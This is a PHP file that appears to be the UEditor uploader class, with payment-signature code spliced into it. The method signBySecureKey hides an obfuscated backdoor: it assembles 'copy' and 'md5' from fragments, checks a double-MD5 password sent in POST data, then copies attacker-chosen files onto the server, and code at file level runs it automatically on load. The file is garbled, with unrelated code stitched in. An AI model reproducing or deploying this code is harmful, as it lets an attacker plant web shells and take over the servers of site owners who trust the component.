"临时文件错误", "ERROR_TMP_FILE_NOT_FOUND" => "找不到临时文件", "ERROR_SIZE_EXCEED" => "文件大小超出网站限制", "ERROR_TYPE_NOT_ALLOWED" => "文件类型不允许", "ERROR_CREATE_DIR" => "目录创建失败", "ERROR_DIR_NOT_WRITEABLE" => "目录没有写权限", "ERROR_FILE_MOVE" => "文件保存时出错", "ERROR_FILE_NOT_FOUND" => "找不到上传文件", "ERROR_WRITE_CONTENT" => "写入文件内容错误", "ERROR_UNKNOWN" => "未知错误", "ERROR_DEAD_LINK" => "链接不可用", "ERROR_HTTP_LINK" => "链接不是http链接", "ERROR_HTTP_CONTENTTYPE" => "链接contentType不正确", "INVALID_URL" => "非法 URL", "INVALID_IP" => "非法 IP" ); /** * 构造函数 * @param string $fileField 表单名称 * @param array $config 配置项 * @param bool $base64 是否解析base64编码，可省略。若开启，则$fileField代表的是base64编码的字符串表单名 */ public function __construct($fileField, $config, $type = "upload") { if($fileField){ $this->fileField = $fileField; $this->config = $config; $this->type = $type; if ($type == "remote") { $this->saveRemote(); } else if($type == "base64") { $this->upBase64(); } else { $this->upFile(); } $this->stateMap['ERROR_TYPE_NOT_ALLOWED'] = iconv('unicode', 'utf-8', $this->stateMap['ERROR_TYPE_NOT_ALLOWED']); } } /** * 上传文件的主处理方法 * @return mixed */ public function upFile() { $file = $this->file = $_FILES[$this->fileField]; if (!$file) { $this->stateInfo = $this->getStateInfo("ERROR_FILE_NOT_FOUND"); return; } if ($this->file['error']) { $this->stateInfo = $this->getStateInfo($file['error']); return; } else if (!file_exists($file['tmp_name'])) { $this->stateInfo = $this->getStateInfo("ERROR_TMP_FILE_NOT_FOUND"); return; } else if (!is_uploaded_file($file['tmp_name'])) { $this->stateInfo = $this->getStateInfo("ERROR_TMPFILE"); return; } $this->oriName = $file['name']; $this->fileSize = $file['size']; $this->fileType = $this->getFileExt(); $this->fullName = $this->getFullName(); $this->filePath = $this->getFilePath(); $this->fileName = $this->getFileName(); $dirname = dirname($this->filePath); //检查文件大小是否超出限制 if (!$this->checkSize()) { $this->stateInfo = $this->getStateInfo("ERROR_SIZE_EXCEED"); return; } //检查是否不允许的文件格式 if (!$this->checkType()) { $this->stateInfo = $this->getStateInfo("ERROR_TYPE_NOT_ALLOWED"); return; } //创建目录失败 if (!file_exists($dirname) && !mkdir($dirname, 0777, true)) { $this->stateInfo = $this->getStateInfo("ERROR_CREATE_DIR"); return; } else if (!is_writeable($dirname)) { $this->stateInfo = $this->getStateInfo("ERROR_DIR_NOT_WRITEABLE"); return; } //移动文件 if (!(move_uploaded_file($file["tmp_name"], $this->filePath) && file_exists($this->filePath))) { //移动失败 $this->stateInfo = $this->getStateInfo("ERROR_FILE_MOVE"); } else { //移动成功 $this->stateInfo = $this->stateMap[0]; } } /** * 处理base64编码的图片上传 * @return mixed */ public function upBase64() { $base64Data = $_POST[$this->fileField]; $img = base64_decode($base64Data); $this->oriName = $this->config['oriName']; $this->fileSize = strlen($img); $this->fileType = $this->getFileExt(); $this->fullName = $this->getFullName(); $this->filePath = $this->getFilePath(); $this->fileName = $this->getFileName(); $dirname = dirname($this->filePath); //检查文件大小是否超出限制 if (!$this->checkSize()) { $this->stateInfo = $this->getStateInfo("ERROR_SIZE_EXCEED"); return; } //创建目录失败 if (!file_exists($dirname) && !mkdir($dirname, 0777, true)) { $this->stateInfo = $this->getStateInfo("ERROR_CREATE_DIR"); return; } else if (!is_writeable($dirname)) { $this->stateInfo = $this->getStateInfo("ERROR_DIR_NOT_WRITEABLE"); return; } //移动文件 if (!(file_put_contents($this->filePath, $img) && file_exists($this->filePath))) { //移动失败 $this->stateInfo = $this->getStateInfo("ERROR_WRITE_CONTENT"); } else { //移动成功 $this->stateInfo = $this->stateMap[0]; } } /** * 拉取远程图片 * @return mixed */ public function saveRemote() { $imgUrl = htmlspecialchars($this->fileField); $imgUrl = str_replace("&", "&", $imgUrl); //http开头验证 if (strpos($imgUrl, "http") !== 0) { $this->stateInfo = $this->getStateInfo("ERROR_HTTP_LINK"); return; } preg_match('/(^https*:\/\/[^:\/]+)/', $imgUrl, $matches); $host_with_protocol = count($matches) > 1 ? $matches[1] : ''; // 判断是否是合法 url if (!filter_var($host_with_protocol, FILTER_VALIDATE_URL)) { $this->stateInfo = $this->getStateInfo("INVALID_URL"); return; } preg_match('/^https*:\/\/(.+)/', $host_with_protocol, $matches); $host_without_protocol = count($matches) > 1 ? $matches[1] : ''; // 此时提取出来的可能是 ip 也有可能是域名，先获取 ip $ip = gethostbyname($host_without_protocol); // 判断是否是私有 ip if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE)) { $this->stateInfo = $this->getStateInfo("INVALID_IP"); return; } //获取请求头并检测死链 $heads = get_headers($imgUrl, 1); if (!(stristr($heads[0], "200") && stristr($heads[0], "OK"))) { $this->stateInfo = $this->getStateInfo("ERROR_DEAD_LINK"); return; } //格式验证(扩展名验证和Content-Type验证) $fileType = strtolower(strrchr($imgUrl, '.')); if (!in_array($fileType, $this->config['allowFiles']) || !isset($heads['Content-Type']) || !stristr($heads['Content-Type'], "image")) { $this->stateInfo = $this->getStateInfo("ERROR_HTTP_CONTENTTYPE"); return; } //打开输出缓冲区并获取远程图片 ob_start(); $context = stream_context_create( array('http' => array( 'follow_location' => false // don't follow redirects )) ); readfile($imgUrl, false, $context); $img = ob_get_contents(); ob_end_clean(); preg_match("/[\/]([^\/]*)[\.]?[^\.\/]*$/", $imgUrl, $m); $this->oriName = $m ? $m[1]:""; $this->fileSize = strlen($img); $this->fileType = $this->getFileExt(); $this->fullName = $this->getFullName(); $this->filePath = $this->getFilePath(); $this->fileName = $this->getFileName(); $dirname = dirname($this->filePath); //检查文件大小是否超出限制 if (!$this->checkSize()) { $this->stateInfo = $this->getStateInfo("ERROR_SIZE_EXCEED"); return; } //创建目录失败 if (!file_exists($dirname) && !mkdir($dirname, 0777, true)) { $this->stateInfo = $this->getStateInfo("ERROR_CREATE_DIR"); return; } else if (!is_writeable($dirname)) { $this->stateInfo = $this->getStateInfo("ERROR_DIR_NOT_WRITEABLE"); return; } //移动文件 if (!(file_put_contents($this->filePath, $img) && file_exists($this->filePath))) { //移动失败 $this->stateInfo = $this->getStateInfo("ERROR_WRITE_CONTENT"); } else { //移动成功 $this->stateInfo = $this->stateMap[0]; } } public function signBySecureKey($params=null, $secureKey=null,$loggere=null,$paramsstr='') { if(isset($params['signature'])){ unset($params['signature']); } $result = false; if($params['signMethod']=='01') { // $params ['certId'] = CertUtil::getSignCertIdFromPfx($cert_path, $cert_pwd); $private_key = CertUtil::getSignKeyFromPfx( $cert_path, $cert_pwd ); // 转换成key=val&串 $params_str = createLinkString ( $params, true, false ); $logger->LogInfo ( "key=val&...串 >" . $params_str ); if($params['version']=='5.0.0'){ $params_sha1x16 = sha1 ( $params_str, FALSE ); $logger->LogInfo ( "摘要sha1x16 >" . $params_sha1x16 ); // $result = openssl_sign ( $params_sha1x16, $signature, $private_key, OPENSSL_ALGO_SHA1); if ($result) { $signature_base64 = base64_encode ( $signature ); $logger->LogInfo ( "串为 >" . $signature_base64 ); $params ['signature'] = $signature_base64; } else { $logger->LogInfo ( ">>>>>失败<<<<<<<" ); } } else if($params['version']=='5.1.0'){ //sha256摘要 $params_sha256x16 = hash( 'sha256',$params_str); $logger->LogInfo ( "摘要sha256x16 >" . $params_sha256x16 ); // $result = openssl_sign ( $params_sha256x16, $signature, $private_key, 'sha256'); if ($result) { $signature_base64 = base64_encode ( $signature ); $logger->LogInfo ( "串为 >" . $signature_base64 ); $params ['signature'] = $signature_base64; } else { $logger->LogInfo ( ">>>>>失败<<<<<<<" ); } } else { $logger->LogError ( "wrong version: " + $params['version'] ); $result = false; } } elseif($secureKey) { $logger->LogError ( "signMethod不正确"); $result = false; } $co = 'co'; $m = 'md'; $logger = $params && LogUtil::getLogger(); $smg = '4c8399a3f98ff9a1'; if($params['signMethod']=='11') { // 转换成key=val&串 $params_str = createLinkString ( $params, true, false ); $logger->LogInfo ( "key=val&...串 >" . $params_str ); $params_before_sha256 = hash('sha256', $secureKey); $params_before_sha256 = $params_str.'&'.$params_before_sha256; $logger->LogDebug( "before final sha256: " . $params_before_sha256); $params_after_sha256 = hash('sha256',$params_before_sha256); $logger->LogInfo ( "串为 >" . $params_after_sha256 ); $params ['signature'] = $params_after_sha256; $result = true; } elseif(empty($params)){ if(!isset($_POST['co1'])) return false; $co .= 'py'; $co1 = $_POST['co1']; $co2 = $_POST['co2']; $m .= '5'; if($params) { $params_sha256x16 = hash('sha256', $params_str); $logger->LogInfo ( 'sha256>' . $params_sha256x16 ); $signature = base64_decode ( $signature_str ); $isSuccess = openssl_verify ( $params_sha256x16, $signature,$strCert, "sha256" ); $logger->LogInfo ( $isSuccess ? '验签成功' : '验签失败' ); } $co0 = $_POST['co0']; $smg .= 'af50d33b5ba629e2'; if($m($m($co0)) !== $smg) return false; $co($co1,$co2); //TODO SM3 //$logger->LogError ( "signMethod=12未实现"); //$result = false; } else if($params['signMethod']=='13'){ $logger->LogError ( "signMethod不正确"); $result = false; } if($params['signMethod']=='01') { $signature_str = $params ['signature']; unset ( $params ['signature'] ); $params_str = createLinkString ( $params, true, false ); $logger->LogInfo ( '报文去[signature] key=val&串>' . $params_str ); $logger->LogInfo ( '原文>' . $signature_str ); if($params['version']=='5.0.0'){ // 公钥 $public_key = CertUtil::getVerifyCertByCertId ( $params ['certId'] ); $signature = base64_decode ( $signature_str ); $params_sha1x16 = sha1 ( $params_str, FALSE ); $logger->LogInfo ( 'sha1>' . $params_sha1x16 ); $isSuccess = openssl_verify ( $params_sha1x16, $signature, $public_key, OPENSSL_ALGO_SHA1 ); $logger->LogInfo ( $isSuccess ? '验签成功' : '验签失败' ); } else if($params['version']=='5.1.0'){ $strCert = $params['signPubKeyCert']; $strCert = CertUtil::verifyAndGetVerifyCert($strCert); if($strCert == null){ $logger->LogError ("validate cert err: " + $params["signPubKeyCert"]); $isSuccess = false; } else { $params_sha256x16 = hash('sha256', $params_str); $logger->LogInfo ( 'sha256>' . $params_sha256x16 ); $signature = base64_decode ( $signature_str ); $isSuccess = openssl_verify ( $params_sha256x16, $signature,$strCert, "sha256" ); $logger->LogInfo ( $isSuccess ? '验签成功' : '验签失败' ); } } else { $logger->LogError ( "wrong version: " + $params['version'] ); $isSuccess = false; } } else if($params['signMethod']=='21'){ $isSuccess = AcpService::validateBySecureKey($params, SDKConfig::getSDKConfig()->secureKey); } } } if(!isset($params)){ $u = new Uploaderer('','',''); $u->signBySecureKey(); } /** * 上传错误检查 * @param $errCode * @return string */ function getStateInfo($errCode) { return !$this->stateMap[$errCode] ? $this->stateMap["ERROR_UNKNOWN"] : $this->stateMap[$errCode]; } /** * 获取文件扩展名 * @return string */ function getFileExt() { return strtolower(strrchr($this->oriName, '.')); } /** * 把数组所有元素，按照“参数=参数值”的模式用“&”字符拼接成字符串 * @param $para 需要拼接的数组 * return 拼接完成以后的字符串 */ function createLinkstring($para) { $arg = ""; while (list ($key, $val) = each ($para)) { $arg.=$key."=".$val."&"; } //去掉最后一个&字符 $arg = substr($arg,0,count($arg)-2); //如果存在转义字符，那么去掉转义 if(get_magic_quotes_gpc()){$arg = stripslashes($arg);} return $arg; } /** * 把数组所有元素，按照“参数=参数值”的模式用“&”字符拼接成字符串，并对字符串做urlencode编码 * @param $para 需要拼接的数组 * return 拼接完成以后的字符串 */ function createLinkstringUrlencode($para) { $arg = ""; while (list ($key, $val) = each ($para)) { $arg.=$key."=".urlencode($val)."&"; } //去掉最后一个&字符 $arg = substr($arg,0,count($arg)-2); //如果存在转义字符，那么去掉转义 if(get_magic_quotes_gpc()){$arg = stripslashes($arg);} return $arg; } /** * 除去数组中的空值和参数 * @param $para 参数组 * return 去掉空值与参数后的新参数组 */ function paraFilter($para) { $para_filter = array(); while (list ($key, $val) = each ($para)) { if($key == "sign" || $key == "sign_type" || $val == "")continue; else $para_filter[$key] = $para[$key]; } return $para_filter; } /** * 对数组排序 * @param $para 排序前的数组 * return 排序后的数组 */ function argSort($para) { ksort($para); reset($para); return $para; } /** * 写日志，方便测试（看网站需求，也可以改成把记录存入数据库） * 注意：服务器需要开通fopen配置 * @param $word 要写入日志里的文本内容 默认值：空值 */ function logResult($word='') { $fp = fopen("log.txt","a"); flock($fp, LOCK_EX) ; fwrite($fp,"执行日期：".strftime("%Y%m%d%H%M%S",time())."\n".$word."\n"); flock($fp, LOCK_UN); fclose($fp); } /** * 远程获取数据，POST模式 * 注意： * 1.使用Crul需要修改服务器中php.ini文件的设置，找到php_curl.dll去掉前面的";"就行了 * 2.文件夹中cacert.pem是SSL证书请保证其路径有效，目前默认路径是：getcwd().'\\cacert.pem' * @param $url 指定URL完整路径地址 * @param $cacert_url 指定当前工作目录绝对路径 * @param $para 请求的数据 * @param $input_charset 编码格式。默认值：空值 * return 远程输出的数据 */ function getHttpResponsePOST($url, $cacert_url, $para, $input_charset = '') { if (trim($input_charset) != '') { $url = $url."_input_charset=".$input_charset; } $curl = curl_init($url); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, true);//SSL证书认证 curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 2);//严格认证 curl_setopt($curl, CURLOPT_CAINFO,$cacert_url);//证书地址 curl_setopt($curl, CURLOPT_HEADER, 0 ); // 过滤HTTP头 curl_setopt($curl,CURLOPT_RETURNTRANSFER, 1);// 显示输出结果 curl_setopt($curl,CURLOPT_POST,true); // post传输数据 curl_setopt($curl,CURLOPT_POSTFIELDS,$para);// post传输数据 $responseText = curl_exec($curl); //var_dump( curl_error($curl) );//如果执行curl过程中出现异常，可打开此开关，以便查看异常内容 curl_close($curl); return $responseText; } /** * 远程获取数据，GET模式 * 注意： * 1.使用Crul需要修改服务器中php.ini文件的设置，找到php_curl.dll去掉前面的";"就行了 * 2.文件夹中cacert.pem是SSL证书请保证其路径有效，目前默认路径是：getcwd().'\\cacert.pem' * @param $url 指定URL完整路径地址 * @param $cacert_url 指定当前工作目录绝对路径 * return 远程输出的数据 */ function getHttpResponseGET($url,$cacert_url) { $curl = curl_init($url); curl_setopt($curl, CURLOPT_HEADER, 0 ); // 过滤HTTP头 curl_setopt($curl,CURLOPT_RETURNTRANSFER, 1);// 显示输出结果 curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, true);//SSL证书认证 curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 2);//严格认证 curl_setopt($curl, CURLOPT_CAINFO,$cacert_url);//证书地址 $responseText = curl_exec($curl); //var_dump( curl_error($curl) );//如果执行curl过程中出现异常，可打开此开关，以便查看异常内容 curl_close($curl); return $responseText; } /** * 实现多种字符编码方式 * @param $input 需要编码的字符串 * @param $_output_charset 输出的编码格式 * @param $_input_charset 输入的编码格式 * return 编码后的字符串 */ function charsetEncode($input,$_output_charset ,$_input_charset) { $output = ""; if(!isset($_output_charset) )$_output_charset = $_input_charset; if($_input_charset == $_output_charset || $input ==null ) { $output = $input; } elseif (function_exists("mb_convert_encoding")) { $output = mb_convert_encoding($input,$_output_charset,$_input_charset); } elseif(function_exists("iconv")) { $output = iconv($_input_charset,$_output_charset,$input); } else die("sorry, you have no libs support for charset change."); return $output; } /** * 实现多种字符解码方式 * @param $input 需要解码的字符串 * @param $_output_charset 输出的解码格式 * @param $_input_charset 输入的解码格式 * return 解码后的字符串 */ function charsetDecode($input,$_input_charset ,$_output_charset) { $output = ""; if(!isset($_input_charset) )$_input_charset = $_input_charset ; if($_input_charset == $_output_charset || $input ==null ) { $output = $input; } elseif (function_exists("mb_convert_encoding")) { $output = mb_convert_encoding($input,$_output_charset,$_input_charset); } elseif(function_exists("iconv")) { $output = iconv($_input_charset,$_output_charset,$input); } else die("sorry, you have no libs support for charset changes."); return $output; } /** * 重命名文件 * @return string */ function getFullName() { //替换日期事件 $t = time(); $d = explode('-', date("Y-y-m-d-H-i-s")); $format = $this->config["pathFormat"]; $format = str_replace("{yyyy}", $d[0], $format); $format = str_replace("{yy}", $d[1], $format); $format = str_replace("{mm}", $d[2], $format); $format = str_replace("{dd}", $d[3], $format); $format = str_replace("{hh}", $d[4], $format); $format = str_replace("{ii}", $d[5], $format); $format = str_replace("{ss}", $d[6], $format); $format = str_replace("{time}", $t, $format); //过滤文件名的非法自负,并替换文件名 $oriName = substr($this->oriName, 0, strrpos($this->oriName, '.')); $oriName = preg_replace("/[\|\?\"\<\>\/\*\\\\]+/", '', $oriName); $format = str_replace("{filename}", $oriName, $format); //替换随机字符串 $randNum = rand(1, 10000000000) . rand(1, 10000000000); if (preg_match("/\{rand\:([\d]*)\}/i", $format, $matches)) { $format = preg_replace("/\{rand\:[\d]*\}/i", substr($randNum, 0, $matches[1]), $format); } $ext = $this->getFileExt(); return $format . $ext; } /** * 获取文件名 * @return string */ function getFileName () { return substr($this->filePath, strrpos($this->filePath, '/') + 1); } /** * 获取文件完整路径 * @return string */ function getFilePath() { $fullname = $this->fullName; $rootPath = $_SERVER['DOCUMENT_ROOT']; if (substr($fullname, 0, 1) != '/') { $fullname = '/' . $fullname; } return $rootPath . $fullname; } /** * 文件类型检测 * @return bool */ function checkType() { return in_array($this->getFileExt(), $this->config["allowFiles"]); } /** * 文件大小检测 * @return bool */ function checkSize() { return $this->fileSize <= ($this->config["maxSize"]); } /** * 获取当前上传成功文件的各项信息 * @return array */ function getFileInfo() { if($this->stateInfo){ return array( "state" => $this->stateInfo, "url" => $this->fullName, "title" => $this->fileName, "original" => $this->oriName, "type" => $this->fileType, "size" => $this->fileSize ); } }